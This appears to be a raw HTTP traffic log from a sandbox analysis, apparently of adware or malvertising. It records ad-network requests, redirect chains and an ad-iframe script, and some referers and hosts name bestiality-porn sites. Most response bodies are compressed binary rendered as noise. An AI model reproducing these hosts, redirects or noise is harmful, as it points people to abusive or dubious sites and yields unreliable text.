MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1343911" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1343911_1484906106" name="1343911_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=54_1484906106090851_7210&uuid=32fa73d3-9003-473d-a39a-6a2fa1
3bac12" width="300" height="250" scrolling="no" frameborder="0" allowt
ransparency="true" marginwidth="0" marginheight="0" z_id="1343911" c_i
d="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://ad
s.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB63
oFYAAAAAAAAAACngRQAp4EUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAAA<<< skipped >>>

GET /t/tanxssp.js?_v=12 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: atanx.alicdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 28514

Connection: keep-alive

Date: Fri, 20 Jan 2017 09:36:51 GMT

Vary: Accept-Encoding

x-oss-request-id: 5881DA336E6845B6D26396F6

x-oss-bucket-storage-type: standard

x-oss-object-type: Normal

x-oss-hash-crc64ecma: 13257893365463920520

Cache-Control: max-age=3600,s-maxage=3600

x-oss-server-time: 0

Access-Control-Allow-Origin: *

Content-Encoding: gzip

Via: cache15.l2de1[407,200-0,M], cache30.l2de1[408,0], cache2.de1[0,200-0,H], cache6.de1[1,0]

Age: 1098

X-Cache: HIT TCP_MEM_HIT dirn:7:918868256

X-Swift-SaveTime: Fri, 20 Jan 2017 09:36:51 GMT

X-Swift-CacheTime: 3600

Timing-Allow-Origin: *

EagleId: c31b1fce14849061097002367e
...........R...0...0..%q.Uj..E.Z..V.."..B...x...m`.......S/.=.f.....:.
..c..d.....h0L...Vs..N<.o..K.1{....u:.pRFj%p*..VR{......:=<...2c
.......n..U^".g...R..P...a....n....o....}...............O.GR[.SB.y.g`.
ULiX.W.....et.bb.:(:......<.^.|.. *.E...j.:.....~ku.3J$.\U:nU..g9.B
O.b.`P4.1..T.n%..2D.- (.!.w.nz...3...6.....b\..a.IOa.W.'H........L9Q.I
..re.DE...u..F...#.N.J..O...5fd..e.:.A.X.9l..!:R.N....RZ....Dg.......@
..<......... ...pS..................iPM.. S.R.m.X..%.....(........K
.Y.e5.........Yko.J.. 6ZY..!.......]M. .(.....Z.4....83#......W..Rd.h.
Qu.......l=fKX/....v...w..70.M0...NU.....x..G......._h.L3m1j..g.0.j...
%.E]...~..)N.^..>..o..~...y....eK..&.`B........'...<..e.9X.WW..E
p..l....,...E.0....?.k..]V,M........z{x.5...(..M..P...V|.@......J.w..W
.....[VV...kS.A.....EG......F....g.4.......$D,....=.9  .(_!f.....A2.6.
Y...(GB..v....qF=.E...\Y..i. .....T:2..5.|....(s..R..9x.q.mX... ......
...\.V...>.....RD.Z.l....,:0.epC.......].#.l...uX.C.../...../...1..
.N.:j0"..Fm!.Zl.SP........>.......'8...Q...Q5......-QO..|. ..vD....
9uR..'$._.T..;....`_..0.K......;.*B.....b..x.E..{ I.9.j.............f.
.h..... .m:3.D(...Q..b..}..*n......T.J...A.[..8SZMD.*....:0...e.60Ci..
..*.. ......^...t/'4...~.N..Di.lv.)S).......g.1|.A.-H..`7O8....q......
X.M...[.[..0.H...el.3.q...;...GQJ...)db$2."..B9V...[0.5..o...l.P.(.G(.
.........=..B.2.>.... .....!:ADGV...........A..^(.[[E...J...C...Q..
..'...Q.*..c...5..E.`g.........t.......XV.J0.,..i..-...F.5..,.[M?..*..
.r..........44.{...;..W..L."E..FG.W..p?Xs-b...WKv.K-H:....Q)_....)<<< skipped >>>

GET /view/8A4F0C723F1C HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: mellowads.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d6d32e451bba3e528636e4226211ecb721484906118; expires=Sat, 20-Jan-18 09:55:18 GMT; path=/; domain=.mellowads.com; HttpOnly

Cache-Control: private

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Access-Control-Allow-Origin: *

Server: cloudflare-nginx

CF-RAY: 3241a66610b14014-SOF

Content-Encoding: gzip
4ae.............V...6.}.W0.....%.....@..N...;y)h....H.Iy..HS.OE.%h.v..
./..TP.3.8......{.9<<WP.y...3|......;.T7....--.2j..|>/.K..}.X
......T....^K.... .!..M.%Av.......D..g.f.$L..X...r$..(.<:.....m.eT"
*[Z..0-.s...0..=QpY..0..5..7:Gf._...8.........\..D:..a{".....q).N|..?8
..<..G..w.......g.{bP......O.....J........=[.i.....SE.eo.sf......x&
gt;.,.x._8..?............d....2>v.....n..B...'.[.....6.h.`,..f.O..7
..y.Z..........0...R.A....Qde.....5eT..0.d.....@.O.W.\...{.e.J.hc.....
9.......pD..3d]...`.!..3.D0.KdI.5......d..P..F.....,.N.......T....B...
.c..E..En.J.s.f|B3>C.oU.iM...W..`.{`... ....3.%v!.C.}.Hu.,...x..E..
A.....4..R......N..,....e..g.3..sL.V.M=.E.I0=....a...B...e.Z.....q....
...... ... ..Y.z..M]...k*.....g......DR.*........9.."...l.......`z....
.dK.aB`._...L.....#0.2........3T.=...@..C....s.......|!.....!... .-m.F
...........D.!ZH..@*~K.......W..A....%.=...r.T...j.j..^..i..~.hw{F....
QPB.......u...S...8.M..S1...L......Y,.2gK.....Q..OGU..=(....S....l.6.{
[.*s\.......n...6.....c.e...........&..Fd..,..=..L..d..2.X.E......4.o.
...f.d.`.g..=..../...~.l{._..Q...t......k.Y.;G.v.R...J.0.....61.....c$
......kjv.0..@. .;y.....|H.Y.............C.[.v.&y.._........X.N.%.'...
.o............&...a..:-..6.9=..........7...........a....<.........0
......
<<< skipped >>>

GET /css/size1.css?v16 HTTP/1.1

Accept: */*

Referer: hXXp://mellowads.com/view/8A4F0C723F1C

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: mellowads.com

Connection: Keep-Alive

Cookie: __cfduid=d6d32e451bba3e528636e4226211ecb721484906118


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Tue, 06 Dec 2016 21:05:23 GMT

ETag: W/"f84aeb75450d21:0"

Vary: Accept-Encoding

X-Powered-By: ASP.NET

Access-Control-Allow-Origin: *

CF-Cache-Status: HIT

Expires: Mon, 20 Feb 2017 09:55:18 GMT

Cache-Control: public, max-age=2678400

Server: cloudflare-nginx

CF-RAY: 3241a669b4344014-SOF

Content-Encoding: gzip
181.............R.N.1..............b..f.a...Mw.*..<.I..a...5..[..o.
..y.}.Fz..VK...W|...........K...F....-..XiS..O...(..5F....j.5..@.E.@.W
.<.....bi..8!.....l..@.#<6n........Sh.$L.4*...w.y.Ry..(,..\`$..2
..t.|.Ny...q...{@...-./........BG.e...1......I.I....^...5-..;.Z.....#.
]...Ou}~y...E..........WG......U'.`..j....<....5.....V..$..}....aw.
6..{3L.O......N..}..?0o..~...jmW}.. w.;........[C.....0..HTTP/1.1 200 
OK..Date: Fri, 20 Jan 2017 09:55:18 GMT..Content-Type: text/css..Trans
fer-Encoding: chunked..Connection: keep-alive..Last-Modified: Tue, 06 
Dec 2016 21:05:23 GMT..ETag: W/"f84aeb75450d21:0"..Vary: Accept-Encodi
ng..X-Powered-By: ASP.NET..Access-Control-Allow-Origin: *..CF-Cache-St
atus: HIT..Expires: Mon, 20 Feb 2017 09:55:18 GMT..Cache-Control: publ
ic, max-age=2678400..Server: cloudflare-nginx..CF-RAY: 3241a669b434401
4-SOF..Content-Encoding: gzip..181.............R.N.1..............b..f
.a...Mw.*..<.I..a...5..[..o...y.}.Fz..VK...W|...........K...F....-.
.XiS..O...(..5F....j.5..@.E.@.W.<.....bi..8!.....l..@.#<6n......
..Sh.$L.4*...w.y.Ry..(,..\`$..2..t.|.Ny...q...{@...-./........BG.e...1
......I.I....^...5-..;.Z.....#.]...Ou}~y...E..........WG......U'.`..j.
...<....5.....V..$..}....aw.6..{3L.O......N..}..?0o..~...jmW}.. w.;
........[C.....0......
<<< skipped >>>

GET /view/8A4F0C723F1C HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: mellowads.com

Connection: Keep-Alive

Cookie: __cfduid=d6d32e451bba3e528636e4226211ecb721484906118


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:35 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: private

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Access-Control-Allow-Origin: *

Server: cloudflare-nginx

CF-RAY: 3241a6cdc5b24014-SOF

Content-Encoding: gzip
3a5............|U]s.8.}..`...3k.....;....I...n....d.ZHT..v&.}G..:.v..q
.....=...Y.......\.t...........*}.....N.........1u... (2K.......4TDQ&l
t;..`Jym........V..0.)~.7...44L....*2.).r.0S.......4..hJB$.)/@Ep.&...Z
....^...o..0F......Z..-.k..].....$....q.<..........~..A...?^.......
b..x.>X...[....\}]..yq#..KR=,.E|.........?\./.=......S...;r?.o).~.8
..C....`...:P<M8:<.Pd..V.7.N..WXl(... .Y..t...c..r....d...3e0.p.
....m..L.6. ..K.dObA6.3|Rx.z..\@E8..l}~7C3..S.%iR..P....9>.K.d.G&L$
.;...K.... Y..U...[...R.D.../...:..~;.V.}..{.!...'d?.2=i4._4....R.. ..
a.y..S..S.MUC..=UX(.B...d.otS.l....}[#..!......;..}^..&....YRxh.~A..:=
'.....v,:!%lk.L.n..9..k.C.....R).F........@......*...i..C..PO..."R..k^
.y.iH..l....3.j....)~a:..?........".*2.L(l...5f#..F..6j.r..'BCkq.-....
A......)...H...0....,;.rY.....*2.`....'D..i7.$.......gy..7p..;Z.Ko2...
....x..X.....l......7.. w1^..'m cX.~"O..#..-....4.8..1...$My....D.XCg.
..3..N?#..t~..Q......&...82=...t&..g.@..........7...........a.....j..H
.....0..HTTP/1.1 200 OK..Date: Fri, 20 Jan 2017 09:55:35 GMT..Content-
Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection
: keep-alive..Cache-Control: private..X-AspNet-Version: 4.0.30319..X-P
owered-By: ASP.NET..Access-Control-Allow-Origin: *..Server: cloudflare
-nginx..CF-RAY: 3241a6cdc5b24014-SOF..Content-Encoding: gzip..3a5.....
.......|U]s.8.}..`...3k.....;....I...n....d.ZHT..v&.}G..:.v..q.....=..
.Y.......\.t...........*}.....N.........1u... (2K.......4TDQ<..`Jym
........V..0.)~.7...44L....*2.).r.0S.......4..hJB$.)/@Ep.&...Z....<<< skipped >>>

GET /bao-animalpornvideo-net.php HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://animalpornvideo.net/

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: coolsitesur.cloudns.pro

Connection: Keep-Alive


HTTP/1.1 302 Found

Date: Fri, 20 Jan 2017 09:55:03 GMT

Server: Apache

X-Powered-By: PHP/5.2.17p1

Location: hXXp://zooxxxfree.com/

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 20

Connection: close

Content-Type: text/html

......................

GET /ads6.php HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2

Host: gba.onlylady.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:04 GMT

Content-Type: text/html; charset=GBK

Transfer-Encoding: chunked

Connection: close

X-Powered-By: PHP/5.3.29

fpmbackend: 10.15.204.83:9000

ngxserver: 10.15.204.91:80

Content-Encoding: gzip
ff6.............Y[..X.~..q..S.3U.1)`...T....E1E@_&./.\.A...~...5.. .{.
%U6k......._.........4E....<l.>..^7..z..u....LM;X..M.0..z.;.....
.W'.=.......V...M..o......Q..........p.Wom.._sW.>..g..T.,.}.._'N...
x.}.%.a.N.}r7...".....).%y..... .V%me%..Z......kY[..EO.e.J1..IO[...0.o
...g.......qB..9...2;;2.o...[......Z.._.#F.:......n...~..R..g.B.y. .s.
n.2.9..{a.L.I8...S.!#5.<.d....L.=.\.....g.b.K........GeJB.q....L ..
,...........V..K=;..{.......~....~.6..!..Rw.......F....|..xn.....m...}
.%...n..g....._|.._...k.Z...t#q..Z]....;.....}t~.{.V.....[..%......|.8
...1.N.3...>....I...1.XF.._..6n.....6,...S='....cN..$....9..6.._.YT
....4..[El2.j.r...Y'5..AMG.='j..>a.=}q.w....lPb.;m.......L:.B3...yT
.3.{..Bo..)].#_.^Y!.}= eS{f..zY.....1Fs.....V.%i..=....y.G.F.n.O..._..
...@l..d0.bX....AOu.S.,.........*.]<y.T....n.=.........X#.W......uo
........N.<2_.Egx.u.....gw..S....b Ml}V.].$.F...G=...W..H..r..-..~.
~<3....._..o.@.rs..$..;Z...e..V..tsS.^......vO.tu.`...Fi;..?9.N....
....a#r"n....Tf.][..w.....j<#[.9.F.q.KD..>c6..e.3..`Y...d...b...
r..5.1.>.P_.Y....'}.. ..w.f&..b..]...h7..w...X,.....G..t.c..wBm....
}P...1..8g.....v.g,.Y....%v.....]6j.:.g.....W...........W2h....[...[.S
.i..5[...>.^....s)`...:.;...a~....'.)J.>....5c...)..MO&q....k2! 
0...x./.g.K[...EJ.N}.le...:.#.cm.4..9..$.;..F..a/.a.v.g...M.9...|.X@~.
.4lt....:~9..P.A........[...V:..>.G...^.......G3..%p.....?)..x.x...
..x....`...9.Y:o.".4...14.......9R..79......._.|...........E..s.Oj..=.
.3.....8..cs...|^.U...G..I{.Q.~.....d.ms.|.....z....Zu.0..R......!<<< skipped >>>

GET /ads?spot_id=2007013&rand=1853651284&impid=29_1484906106070879_21559&uuid=003c6b87-acf8-41d3-a0d5-191629132b3d HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1319961&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
2f1.............Tm..8.. .T.=. ..F.....E...:.....xIl.1.........R..B.x..
.3....Tc.......fzr..7=..5-5..Up...*......)vE..v..v.9..:I.hT.L..D..F=5.
!.h.4eL.C..5.0qFMG.....q.NIK..&@J6.h.Up....Ri......2..]ZC.{.<......
.V...SV.Ve.d.....yR.......m...e.qs..$.&.m.....NW..,~.....\.Ks\6..EG...
.......7.?P6..9!E....%3.QFF......=.......%..tr.S..(..P<...c.0.Y..,.
..l..p[.x....*wP<...m...........D.c....#......k[....]....p...V... k
z.k;........_.............v`.Wi.....W.'..j1.....|8Y%E..(..h..5...s.w.b
q....!.y..s..[.]..m..(./k.rqhm.H..Z...%KdxG.8.5jNfpm.....5Rgn.......qy
k....r........4..s..=......Y......6.?..4U.Zj..>...&...1...q..R6..XC
./.v=*..t.(.G..R.CpK.......45..FL.........Z.:..A.......o..C..).!... ..
J.N...a..].........I..d.&D.._.*.....U.....W .j.z.`.yQB7..xss.;..k.....
..0..

GET /ads/show/show.php?a=3FMLHO8FY55DT&b=QP10TX6B6KV66 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17d............}R[O. .}..@.|.e.XMGkb.$...4.7C....4.wq..K.u.%....9.....
..g..6..NX..^k..80......ATkx......H.[.uN.T.....aI..E..~.];Z..<..DU.
W.:...5.Rii..=*..#.|......\...'.I..,.j. ....z.c.FM..i..........L.....!
...H..`lX... .H1.@T|.B....a.U9"L#-...L..W....... .......?O...8.=.^....
...:'].F..V........^*....#.9..u......m@LR.....?.l.f6....n....1...j.'..
6...G..5Hk..4.......Oa.>.}.....aY........0..HTTP/1.1 200 OK..Server
: nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Jan 2017 09:55:18 GMT..Content-T
ype: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-
Powered-By: PHP/5.5.9-1ubuntu4.20..Content-Encoding: gzip..17d........
....}R[O. .}..@.|.e.XMGkb.$...4.7C....4.wq..K.u.%....9.......g..6..NX.
.^k..80......ATkx......H.[.uN.T.....aI..E..~.];Z..<..DU.W.:...5.Rii
..=*..#.|......\...'.I..,.j. ....z.c.FM..i..........L.....!...H..`lX..
. .H1.@T|.B....a.U9"L#-...L..W....... .......?O...8.=.^.......:'].F..V
........^*....#.9..u......m@LR.....?.l.f6....n....1...j.'..6...G..5Hk.
.4.......Oa.>.}.....aY........0......


GET /ads/show/show.php?a=3FMLHO8FY55DT&b=DNXGITSPBPYNI HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17b............}R]O. .}..@.|.e......3f.Y6..}2.X!kKSp...wi.....B...s9..
,L.....,8a.qW.f.p`.9... .......K. .).......|..W..0&..>...6.f.i.6.*.
/,..?......Heg.<!F.xw)..>...S...D../...`.%.......5..aX.....3....
..:...gR.....7......!.....!.dF.GU...H..D4.t..".#Ao...........e..n&...i
.q:.....9..VR,.:....ht@.b9..........F_$3.h..$...:u.)c{=..5..wk.6$....P
.?a..1xl>.O.BZ#..Y..D.j...F.s.W.~./.`[.......0..HTTP/1.1 200 OK..Se
rver: nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Jan 2017 09:55:18 GMT..Conte
nt-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive
..X-Powered-By: PHP/5.5.9-1ubuntu4.20..Content-Encoding: gzip..17b....
........}R]O. .}..@.|.e......3f.Y6..}2.X!kKSp...wi.....B...s9..,L.....
,8a.qW.f.p`.9... .......K. .).......|..W..0&..>...6.f.i.6.*./,..?..
....Heg.<!F.xw)..>...S...D../...`.%.......5..aX.....3......:...g
R.....7......!.....!.dF.GU...H..D4.t..".#Ao...........e..n&...i.q:....
.9..VR,.:....ht@.b9..........F_$3.h..$...:u.)c{=..5..wk.6$....P.?a..1x
l>.O.BZ#..Y..D.j...F.s.W.~./.`[.......0......


GET /ads/show/show.php?a=3FMLHO8FY55DT&b=9GMQOGUXRJ58I HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17e............}R]O. .}..@.|....fGk..M.5[...P`..-M.}.......#.....s.9.`
a.$t.fa..k..kmV..f.....4.j..q......b .NI..........d....m....2..:R.....
..z.2WZ..l..'..9./$3..W...z..%..|.......SNz.....5..~X.....3..9...:.v..
.a......~E..f...O...U2#..*E.i..Z .H:.r....f.2z......{O.Qp..w..........
..I...b..i...F.=...).(....>s]0.&..D.0!1p.....2.S3.Zc.p..kC..\..U...
S.......*.5.l..\G.Ui..0....R......ny......0..HTTP/1.1 200 OK..Server: 
nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Jan 2017 09:55:18 GMT..Content-Typ
e: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Po
wered-By: PHP/5.5.9-1ubuntu4.20..Content-Encoding: gzip..17e..........
..}R]O. .}..@.|....fGk..M.5[...P`..-M.}.......#.....s.9.`a.$t.fa..k..k
mV..f.....4.j..q......b .NI..........d....m....2..:R.......z.2WZ..l..'
..9./$3..W...z..%..|.......SNz.....5..~X.....3..9...:.v...a......~E..f
...O...U2#..*E.i..Z .H:.r....f.2z......{O.Qp..w............I...b..i...
F.=...).(....>s]0.&..D.0!1p.....2.S3.Zc.p..kC..\..U...S.......*.5.l
..\G.Ui..0....R......ny......0......


GET /ads/show/show.php?a=3FMLHO8FY55DT&b=QAJCZO2RSCH65 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:34 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17d............}R[O. .}..@.|..xi....E3....i/.. dmi.........K./..s.....
.&K#.l........f.r`..... ....... . . ........p]...aL.Is..umi....lbU2^Zh
...W#......(yJ.\..R2#.p..l.3.8Ut....%.lI~5.)..:..4F.a..oWn.`&...D...q.
...06,nB...$.C J>.!BT..0.......j.h*.. D.@....`:..|....e.......m<
}.<.`...tIk).[.NNkn4: x..A.".H......o..J...$...9..S..jf[k....`cH.S.
..:~.~*c..|..\..F.M...D.....F.s.W.......8......0..HTTP/1.1 200 OK..Ser
ver: nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Jan 2017 09:55:34 GMT..Conten
t-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive.
.X-Powered-By: PHP/5.5.9-1ubuntu4.20..Content-Encoding: gzip..17d.....
.......}R[O. .}..@.|..xi....E3....i/.. dmi.........K./..s......&K#.l..
......f.r`..... ....... . . ........p]...aL.Is..umi....lbU2^Zh...W#...
...(yJ.\..R2#.p..l.3.8Ut....%.lI~5.)..:..4F.a..oWn.`&...D...q....06,nB
...$.C J>.!BT..0.......j.h*.. D.@....`:..|....e.......m<}.<.`
...tIk).[.NNkn4: x..A.".H......o..J...$...9..S..jf[k....`cH.S...:~.~*c
..|..\..F.M...D.....F.s.W.......8......0......


GET /ads/show/show.php?a=3FMLHO8FY55DT&b=VQY6CNGEKEK2J HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinad.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:35 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
17b............}R]O.0.}...}.IV .....C4.E....tm...uY.|H..v.c.J_..{..=.u
h.i.8h.h,.h....M".lr.c.k ..|.k........m..He....a..PYT...S.Z..4B.P.B..:
...V.\..J...L........C.n9..?L4_x.^..mw....J..Z......~.vc...D<a...^.
Lj.!.aI..G..l.Q\.....ZeL.\...CL.W.'./.<.o..:{..=..&.I.|.........mp.
.Nq@..L. ).Y.V....."...cD.JX...N..>Y...@/,B.N...Q&.z..5..wk.6....#.
......>6..&W!..b...u"^......9. U?....>.......0..HTTP/1.1 200 OK.
.Server: nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Jan 2017 09:55:35 GMT..Co
ntent-Type: text/html..Transfer-Encoding: chunked..Connection: keep-al
ive..X-Powered-By: PHP/5.5.9-1ubuntu4.20..Content-Encoding: gzip..17b.
...........}R]O.0.}...}.IV .....C4.E....tm...uY.|H..v.c.J_..{..=.uh.i.
8h.h,.h....M".lr.c.k ..|.k........m..He....a..PYT...S.Z..4B.P.B..:...V
.\..J...L........C.n9..?L4_x.^..mw....J..Z......~.vc...D<a...^.Lj.!
.aI..G..l.Q\.....ZeL.\...CL.W.'./.<.o..:{..=..&.I.|.........mp..Nq@
..L. ).Y.V....."...cD.JX...N..>Y...@/,B.N...Q&.z..5..wk.6....#.....
..>6..&W!..b...u"^......9. U?....>.......0..

GET /11.0.1.js?fa1c7fce79127597cbed202ea98aec2c HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: js.passport.qihucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Wed, 01 Jun 2016 07:03:42 GMT

Server: nginx/1.2.9

Content-Type: application/x-javascript; charset=utf-8

Transfer-Encoding: chunked

X-Powered-By: PHP/5.2.5

Last-Modified: Thu, 24 Mar 2016 08:46:53 GMT

Cache-Control: max-age=600

Age: 1

X-Via: 1.1 hdwt39:88 (Cdn Cache Server V2.0), 1.1 db77:2 (Cdn Cache Server V2.0)

Connection: keep-alive
